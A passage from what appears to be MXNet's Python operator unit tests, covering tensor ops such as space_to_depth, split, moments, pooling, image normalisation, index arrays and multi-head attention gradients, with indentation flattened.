check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
